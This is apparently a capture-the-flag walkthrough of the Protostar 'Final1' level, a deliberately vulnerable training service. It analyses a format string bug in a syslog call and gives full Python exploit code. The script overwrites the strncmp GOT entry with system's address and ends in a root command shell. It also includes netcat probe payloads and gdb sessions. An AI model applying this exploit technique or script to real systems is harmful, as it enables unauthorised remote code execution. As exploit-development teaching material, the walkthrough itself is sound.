Protostar 0x16 - Final1

Prev: 0x15 - Final0

This level is a remote format string exploit with a little twist - the vulnerability here will be much less obvious than in prior format string exploit exercises.



Let's start by analyzing the source code. First, there are no surprises in "main," and we can see that it operates in the same way as before. This time, however, it calls two new functions: "getipport" and "parser."

"getipport" uses the "getpeername" function to obtain our IP address and port, and then stores them via "sprintf" as a formatted "ip:port" string in the 64-byte "hostname" buffer.

Then, "parser" reads our input in an endless loop via "fgets," printing "[final1] $" each time and stripping the trailing carriage return and newline with a custom "trim" function before parsing the line. If we enter "username " followed by some other input, that additional input is copied into a 128-byte "username" buffer. If we enter "login " followed by some input, the program first checks whether we've already entered a username and, if we have, passes our extra input as the sole "pw" (likely "password") argument to a "logit" function.

Finally, checking "logit," we can see that it declares a 512-byte buffer called "buf" and fills it with a formatted string via "snprintf." This string contains "hostname," "username," and the password ("pw"), and is then passed into "syslog."
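To see exactly what string reaches "syslog," here is a minimal Python model of the "snprintf" call in "logit." It assumes the format string "Login from %s as [%s] with password [%s]" (it matches the text this level writes to syslog; any trailing newline is left out) and mimics "snprintf" truncating to the 512-byte buffer. The name "logit_buf" is hypothetical.

```python
BUF_SIZE = 512  # size of "buf" in logit()

# Assumed format string, matching the text the level logs.
LOG_FORMAT = "Login from %s as [%s] with password [%s]"

def logit_buf(hostname, username, pw):
    """Model what snprintf() leaves in buf: the formatted text, cut to BUF_SIZE - 1 chars."""
    text = LOG_FORMAT % (hostname, username, pw)
    return text[:BUF_SIZE - 1]  # snprintf keeps one byte for the terminating NUL

buf = logit_buf("127.0.0.1:46924", "AAAA %x %x", "%x %x")
print(buf)
```

The "%x" sequences we typed survive untouched into "buf" - and "buf" is the string that "syslog" will treat as its format.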

Per the "syslog" man page, this function is part of a family of functions that send messages to the system logger. Its prototype is "void syslog(int priority, const char *format, ...);": a priority value, followed by a printf-style format string and whatever arguments that format consumes.


We can see that the "priority" argument is the bitwise OR of "LOG_USER" and "LOG_DEBUG" (both described on the "syslog" man page), and that "buf" (which contains our "hostname," "username," and "password") is passed in as the "format" argument. However, we know from previous exercises that this is not proper practice! User-supplied data should be passed as an argument matched by a conversion specifier such as "%s" for a string - it should never be passed in directly as the format! Because it is passed directly here, we should be able to supply our own conversion specifiers to pop values from the stack.
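To make "popping values from the stack" concrete, here is a toy Python model (not glibc's real implementation) of how a printf-style function walks its arguments: each "%x" consumes the next 32-bit word, while a positional "%N$x" reads the Nth word directly. The list of words stands in for whatever happens to sit where "syslog" expects its variadic arguments; "toy_format" is a hypothetical name, and only "%x" is handled.

```python
import re

# Matches "%x" or a positional "%N$x"; everything else is copied literally.
SPEC = re.compile(r"%(?:(\d+)\$)?x")

def toy_format(fmt, stack_words):
    """Toy printf that only understands %x and %N$x, reading from stack_words."""
    next_arg = [0]  # index of the next sequential argument (list so expand() can update it)

    def expand(match):
        if match.group(1):                      # %N$x: 1-based positional argument
            word = stack_words[int(match.group(1)) - 1]
        else:                                   # %x: consume the next argument
            word = stack_words[next_arg[0]]
            next_arg[0] += 1
        return "%x" % word

    return SPEC.sub(expand, fmt)

# The caller passed no extra arguments, but the function reads these words anyway.
stack = [0x8049ee4, 0x804a2a0, 0x804a220]
print(toy_format("AAAA %x %x %x", stack))
print(toy_format("%3$x", stack))
```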

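The man page even warns against this, advising that a string containing user-supplied data should never be passed as the format, and that "syslog(priority, "%s", string);" should be used instead.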


Before writing our Python script, let's first test our theory by quickly sending some input using "nc," or "netcat."


$ nc localhost 2994
[final1] $ username AAAA %x %x %x %x %x %x %x %x
[final1] $ login %x %x %x %x %x %x %x %x
login failed
[final1] $ ^C


Now, using the "tail" command, we can print the end of the syslog file:


$ tail /var/log/syslog
Jan 25 08:15:29 (none) kernel: [150182.049572] usb 2-2.1: new full speed USB device using uhci_hcd and address 26
Jan 25 08:15:29 (none) kernel: [150182.470650] usb 2-2.1: New USB device found, idVendor=0e0f, ...
Jan 25 08:17:12 (none) final1: Login from 127.0.0.1:46924 as [AAAA 8049ee4 804a2a0 804a220 bffffbd6 b7fd7ff4 bffffa28 69676f4c 7266206e] with password [31206d6f 302e3732 312e302e 3936343a 61203432 415b2073 20414141 25207825]


It worked as expected - the %x specifiers we passed in through the "format" argument of "syslog" were treated as legitimate conversion specifiers, so the function popped values off the stack. What's more, our input "AAAA" straddles the 14th and 15th values: the 14th (415b2073) ends with our first "A" (0x41), and the 15th (20414141) holds the other three.
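How do we recognize our own data in that output? x86 stores 32-bit words little-endian, so each printed value can be turned back into the four bytes it came from. This short Python sketch decodes the 7th through 15th values from the log line above ("decode_words" is a hypothetical helper name):

```python
import struct

# 7th through 15th %x values from the first syslog line
leaked = "69676f4c 7266206e 31206d6f 302e3732 312e302e 3936343a 61203432 415b2073 20414141"

def decode_words(hex_words):
    """Turn printed %x values back into the raw bytes they held in memory (little-endian)."""
    return b"".join(struct.pack("<I", int(w, 16)) for w in hex_words.split())

print(decode_words(leaked))
```

The result reads "Login from 127.0.0.1:46924 as [AAAA " - the start of "buf" itself, which is why our "AAAA" eventually shows up among the popped values.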

Unfortunately, it isn't aligned, so we'll need to pad our input with one extra byte to fix that (don't forget the trailing space after "login," since "parser" only matches the six characters "login "):


$ nc localhost 2994
[final1] $ username BAAAA %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x
[final1] $ login
login failed
[final1] $ ^C
$ tail /var/log/syslog
...
Jan 25 08:29:35 (none) final1: Login from 127.0.0.1:46925 as [BAAAA 8049ee4 804a2a0 804a220 bffffbd6 b7fd7ff4 bffffa28 69676f4c 7266206e 31206d6f 302e3732 312e302e 3936343a 61203532 425b2073 41414141 ] with password []
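Why exactly one byte? Our username sits after "Login from <ip>:<port> as [" inside "buf," so the padding depends on the length of "hostname." The following sketch redoes that arithmetic, assuming (from the leaks above) that "buf" starts at the 7th argument and that the prefix is exactly "Login from " + hostname + " as ["; the function name "alignment" is hypothetical.

```python
BUF_FIRST_ARG = 7  # observed: "69676f4c" ("Logi") is the 7th %x value

def alignment(ip, port):
    """Return (padding bytes, argument index) of the first aligned word of our username."""
    hostname = "%s:%d" % (ip, port)            # mirrors sprintf(hostname, "%s:%d", ...)
    prefix_len = len("Login from ") + len(hostname) + len(" as [")
    pad = -prefix_len % 4                      # bytes needed to reach a 4-byte boundary
    arg_index = BUF_FIRST_ARG + (prefix_len + pad) // 4
    return pad, arg_index

print(alignment("127.0.0.1", 46925))
print(alignment("192.168.1.10", 46925))  # hypothetical remote address
```

For "127.0.0.1" with a 5-digit port this gives one byte of padding and the 15th argument, matching the log. From another machine (such as the hypothetical "192.168.1.10") it gives two bytes and the 16th argument, so the padding, the argument indices, and anything else that depends on the prefix length would need recomputing.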


Great: with one byte of padding, the next four bytes line up exactly with the 15th "argument," so we can reference them directly. Now, let's prep for our arbitrary write. What should our target be?

We could place shellcode in our buffer and overwrite a saved return address on the stack with its address, but as we saw in the last level, this can be messy even with a large buffer, and it would be far worse with only 128 bytes per line. We would be working with a small NOP slide, which would require us to be very precise. Additionally, at some point we must acknowledge some of the more modern limitations that we've tiptoed around thus far, chief among them a non-executable stack.

So, what other options do we have? Recall from our Stack6 exercise that, when the stack was not a valid memory segment for us to return into, we instead returned into the shared libc library. More specifically, we returned into "system" and provided "/bin/sh" as the argument. We could do something similar here.

However, we may want to do it a bit differently. In the Stack6 level, we wrote two addresses: the first was the address of "system," which overwrote a return address, and the second was the address of a "/bin/sh" string. With a format string, this would likely mean four separate writes, each covering one half of an address as we did in Format3 and Format4, so as to avoid printing roughly 0xb7000000 (over three billion) padding characters.

Let's instead consider a write to the Global Offset Table (GOT), as we did in our Heap3 exercise. The GOT holds the addresses of shared-library functions, which the dynamic linker fills in at runtime; because it is updated while the program runs, it is writable. Each call to a libc function goes through a small PLT stub that jumps to whatever address is stored in that function's GOT entry, so if we overwrite the entry with the address of "system," "system" will be called instead of the original function.

Now we just need to choose which libc function's entry to overwrite. Two convenient candidates are called inside the ever-looping "parser" function every time we send a line: "printf" and "strncmp." However, the first argument of "strncmp" is "line," our input buffer (already stripped of its trailing newline by "trim"). So if we overwrite the GOT entry for "strncmp" with the address of "system," every line we send afterwards will be passed to "system" as its command! We could execute anything - including "/bin/sh" - simply by typing it in!
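The redirection can be pictured with a toy Python model (purely illustrative: in the real binary, a PLT stub jumps through the GOT slot). Every call looks up its target in a table, so replacing one entry changes where later calls land, while the arguments come along unchanged. "real_strncmp," "fake_system," "GOT," and "call" are all hypothetical names.

```python
def real_strncmp(a, b, n):
    """Stand-in for libc strncmp: compare at most n characters, return <0, 0 or >0."""
    a, b = a[:n], b[:n]
    return (a > b) - (a < b)

executed = []  # records the commands our fake system() was asked to run

def fake_system(command, *ignored):
    """Stand-in for libc system(): record the command instead of running it."""
    executed.append(command)
    return 0

GOT = {"strncmp": real_strncmp}  # toy Global Offset Table: name -> function

def call(name, *args):
    """Every call goes through the table, like a PLT stub jumping through its GOT slot."""
    return GOT[name](*args)

line = "/bin/sh"
call("strncmp", line, "username ", 9)   # normal comparison, nothing executed
GOT["strncmp"] = fake_system            # the format-string write, in miniature
call("strncmp", line, "username ", 9)   # the same call now hands line to "system"
print(executed)
```

The extra "username " and 9 arguments do no harm in the real binary either, since "system" only reads its first argument.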

Let's now load the program in gdb so we can grab these addresses. Don't forget to break at the start of "main" and run the program, so that libc is loaded and we can look up the address of "system."


$ gdb /opt/protostar/bin/final1
GNU gdb (GDB) 7.0.1-debian
...
Reading symbols from /opt/protostar/bin/final1...done.
(gdb) break *main
Breakpoint 1 at 0x8049ab9: file final1/final1.c, line 68.
(gdb) r
Starting program: /opt/protostar/bin/final1
...
(gdb) x system
0xb7ecffb0 <__libc_system>:     0x890cec83
(gdb) disas parser
Dump of assembler code for function parser:
...
0x0804997f <parser+66>: call   0x8048d9c <strncmp@plt>
...
(gdb) x/i 0x8048d9c
0x8048d9c <strncmp@plt>:        jmp    *0x804a1a8


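Excellent - we now have both the address of "system" (0xb7ecffb0) and the location of the "strncmp" entry in the GOT (0x804a1a8). We'll write the address in two halves: 0xffb0 into 0x804a1a8 and 0xb7ec into 0x804a1aa. Since "%n" always stores a full 4 bytes, we write the lower half first (right-to-left in the diagram), so that the spill-over from the second write lands beyond our target rather than clobbering the half we've already written. And since "%n" stores the running count of printed characters, which can only grow, the second value must be larger than the first. 0xb7ec is smaller than 0xffb0, so we write the 5-digit value 0x1b7ec instead; its extra high-order bytes (0x01 and 0x00) land just past the "strncmp" entry, in the low half of the next GOT slot, which evidently doesn't get in our way here. A diagram is below: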


32-bit|        |
      |  0xffb0|
 + 0x01b7ec    |
 ---------------
    0x1b7ecffb0|
32-bit|b7ecffb0|
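The padding widths in the exploit are plain arithmetic. Before our first "%n," 40 characters have already been counted: the 31-character "Login from 127.0.0.1:PORT as [" prefix (assuming a 5-digit port), our "B," and the two 4-byte addresses. This sketch derives both widths from the gdb addresses, assembles the same payload the exploit sends, and checks for bytes that "fgets," "trim," or "strcpy" would cut off. The constant names are hypothetical.

```python
import struct

SYSTEM = 0xb7ecffb0           # address of system() found in gdb
GOT_STRNCMP = 0x804a1a8       # strncmp's GOT entry
ALREADY_PRINTED = 31 + 1 + 8  # log prefix + "B" pad + two addresses (assumes a 5-digit port)

low = SYSTEM & 0xffff         # 0xffb0, written first, to GOT_STRNCMP
high = SYSTEM >> 16           # 0xb7ec, written second, to GOT_STRNCMP + 2
if high <= low:
    high += 0x10000           # the count only grows, so write 0x1b7ec instead

width1 = low - ALREADY_PRINTED  # characters to print before the first %n
width2 = high - low             # characters to print before the second %n

payload = (struct.pack("<I", GOT_STRNCMP) + struct.pack("<I", GOT_STRNCMP + 2)
           + ("%%%dd%%15$n%%%dd%%16$n" % (width1, width2)).encode("ascii"))

# fgets() stops at "\n", trim() cuts at "\r", and strcpy() stops at "\0".
assert not any(c in payload for c in (b"\x00", b"\n", b"\r"))
print("%d %d" % (width1, width2))
```

This prints the same 65416 and 47164 used in the exploit; if the prefix length changes (a different client address or port length), only ALREADY_PRINTED and the argument indices need to move.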


Here is our exploit. Once again, I've structured the code this way for readability purposes, which is why it is so verbose:


import socket
import struct

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('localhost', 2994))

#system = 0xb7ecffb0
strncmp1 = struct.pack("<I", 0x804a1a8) #strncmp's GOT entry: receives the low half (0xffb0)
strncmp2 = struct.pack("<I", 0x804a1aa) #GOT entry + 2: receives the high half (0xb7ec, written as 0x1b7ec)

pad_to_ffb0 = "%65416d"   #40 chars already printed + 65416 = 0xffb0
write1 = "%15$n"          #strncmp1 is the 15th argument
pad_to_1b7ec = "%47164d"  #0xffb0 + 47164 = 0x1b7ec
write2 = "%16$n"          #strncmp2 is the 16th argument

payload = strncmp1 + strncmp2 + pad_to_ffb0 + write1 + pad_to_1b7ec + write2

s.send("username " + "B" + payload + "\n") #"B" aligns strncmp1 with the 15th argument
s.send("login " + "\n")                    #logit() hands our username to syslog() as the format
s.send(raw_input()) #raw_input() blocks, keeping the connection (and the child process) alive


Finding the proper padding by trial and error, examining the GOT "strncmp" entry in each core dump, can be a tiring process; the widths can also be worked out directly from the character count. If we run the above program, we can see that we've done it! Or at least, we don't get a core dump... but how can we confirm the address is correct?

Well, we know that "final1" is always running, and each time we connect it forks a child process of the same name to handle our session. So, if we find the child's process id, we can attach gdb to it while it's running. To do this, we'll note the pid of the parent process, run our Python script to create the child process, and then, from a second terminal on the VM, find the child's pid and attach gdb to it.
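If "pidof" lists several candidates (for example, with more than one connection open), the child can also be identified by its parent pid. A Linux-only Python sketch, assuming the standard "/proc/<pid>/stat" layout ("pid (comm) state ppid ..."); the helper names are hypothetical:

```python
import os

def parent_of(pid):
    """Return the parent pid of `pid` by reading /proc/<pid>/stat (Linux only)."""
    with open("/proc/%d/stat" % pid) as f:
        stat = f.read()
    # The command name is in parentheses and may contain spaces,
    # so start after the last ')' before splitting into fields.
    fields = stat[stat.rindex(")") + 2:].split()
    return int(fields[1])  # fields[0] is the state, fields[1] is the ppid

def children_of(parent):
    """List the pids whose parent is `parent`."""
    kids = []
    for name in os.listdir("/proc"):
        if name.isdigit():
            try:
                if parent_of(int(name)) == parent:
                    kids.append(int(name))
            except (IOError, OSError):  # process exited while we were scanning
                pass
    return sorted(kids)
```

In the session that follows, "children_of(1710)" would be expected to return the single child pid that "pidof" reports alongside the parent.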

Original terminal:

$ pidof final1
1710
$ python final1.py


New terminal:

$ pidof final1
12375 1710
$ gdb --pid 12375
GNU gdb (GDB) 7.0.1-debian
...
Loaded symbols for /lib/ld-linux.so.2
(gdb) x/x 0x804a1a8
0x804a1a8 <_GLOBAL_OFFSET_TABLE_+188>:  0xb7ecffb0


Confirmed - we've overwritten the "strncmp" GOT entry with the address of "system"!

Now we can rework the end of our Python script: read the prompts as they arrive, then loop, sending each line we type as a command and printing the response:


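# ... (imports, connection and payload construction as above) ...
s.recv(1024)                                 # initial "[final1] $ " prompt
s.send("username " + "B" + payload + "\n")
s.recv(1024)                                 # prompt
s.send("login " + "\n")                      # logit() -> syslog() performs the GOT write
s.recv(1024)                                 # "login failed" and/or prompt

while True:
        s.send(raw_input() + "\n")           # strncmp(line, ...) now runs system(line)
        s.recv(1024)                         # discard one chunk (e.g. a prompt); recv boundaries are timing-dependent
        print s.recv(1024)                   # command output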


When we run it:


# python final1.py
whoami
root

id
uid=0(root) gid=0(root) groups=0(root)


This is too cool!
